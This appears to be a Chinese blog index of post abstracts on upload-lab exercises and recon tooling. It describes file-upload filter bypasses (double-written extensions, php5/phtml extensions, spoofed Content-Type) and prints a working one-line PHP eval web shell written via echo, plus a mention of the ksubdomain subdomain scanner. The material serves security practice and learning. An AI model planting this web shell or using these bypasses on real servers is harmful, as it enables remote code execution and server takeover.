摘要：双写绕过：把filename.php修改为filename.pphphp 过滤掉php后就会变成filename.php 阅读全文

摘要：pass-03 只禁止了部分扩展名，还有.php5等扩展名可以解析为PHP。 上传.php5即可。 类似的扩展名有：php2，php3、php4、php5、phtml、等 阅读全文

摘要：上传的时候修改Content-Type为image/jpeg等程序指定的类型即可。 修改为： 使用蚁剑连接测试 阅读全文

摘要：Windows 错误写马 正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php 阅读全文

摘要：概述 开源地址：https://github.com/knownsec/ksubdomain 二进制文件下载：https://github.com/knownsec/ksubdomain/releases 在linux下，还需要安装libpcap-dev,在Windows下需要安装WinPcap，m 阅读全文